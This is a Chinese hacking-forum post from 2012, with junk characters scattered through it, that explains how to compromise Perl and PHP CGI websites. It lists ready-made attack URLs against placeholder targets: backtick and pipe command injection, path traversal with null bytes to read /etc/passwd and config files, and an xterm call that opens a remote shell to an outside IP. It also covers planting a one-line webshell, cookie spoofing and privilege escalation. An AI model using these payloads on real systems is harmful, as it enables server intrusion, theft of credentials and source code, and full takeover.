总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 9 `7 q8 \* U# r; \( A# U
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权 4 V; P o+ Y. K; ^2 u
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们 4 i1 W- @% [" p
注“ $ G4 O* W3 S1 H$ P3 D& k
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 & e! {" s% |. ]" q/ D: y
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET " ^% N7 H7 t, e& `4 R {" c
% w8 V0 y' q: f5 V, F& [+ D: [
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 : C# f7 X0 m( T) p! m' g. X
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
% C7 [; x9 f7 M) f( P$ chttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
8 }0 p4 b3 b9 [0 I/ U6 S; y3 khttp://target.com/cgi-bin/home/news/sub.pl?`id` " D% x* e; @5 V4 |) T
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
6 ?) ]3 w( i" ]" k( Vhttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 6 [# L3 n. D! F& H
1 M& j) X3 h& h1 ghttp://target.com/test.pl;ls| & }& a7 I, |& o/ W
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| / p& S" y# \4 C2 p7 \+ S5 `+ o
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| 3 c% [* |* W7 ]( R
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造
7 I, \3 V% I+ x6 Y比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
. m3 }! v# \1 C" r5 e V' z9 R7 Uhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection 6 D! {/ ^8 N8 v. L) i8 u7 n i7 m
* `* x* c4 n9 b0 [3 U1 H: }
http://target.com/test.pl?&........ /../../etc/passwd
% V; {0 s! c2 s8 R9 [' _& k( X" X" ]' X; U2 T
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./ " o# K) }) x) f A
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了
7 Q8 A7 ] A. O3 K6 ~0 A9 y/ E( V `http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 4 V& s# p/ l+ |/ D' p+ k8 L
' C& @9 [0 _; a7 V3 O6 Lhttp://www.target.org/show.php?f ... /include/config.php 查看php代码
1 T, ~7 q+ K7 q- ?) ^http://www.target.org/show.php?f ... ng/admin/global.php
! c0 \) q/ P# e6 v+ q' b9 Z$ G T5 S; i. z+ E* @8 e
emm和ps的一句话' J& I; L$ ~, P) c- r8 X- L7 Z
- G* x: f; g P( R5 uhttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 : D* O/ W( z. m9 q% m
* W: v/ d0 w0 j6 D3 h: C3 I>bbb%20|
. g+ N% Q# R; E: k) h% a
: C! K% x3 c. K" {3 h# g/ v5 fhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串 1 s+ x7 O7 d0 ~& N$ Z
/ x+ ?9 t$ m% _+ h* L0 q( vhttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 9 |5 L: ~; s# C* C
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin 4 Z" Y, Q) a; N/ U
, h( V8 A* G. i) i+ n" m
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 9 G+ k" K1 F3 N+ {
http://target.com/index.html#cmd.exe
$ m. W) T3 M; |/ e" L: Rhttp://target.com/index.html?dummyparam=xp_cmdshell ' }+ U) w$ V/ }8 z5 e1 k
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd . D4 k7 N4 u- h* L
|
发表于 2012-9-13 16:56:16
收藏
分享
支持
反对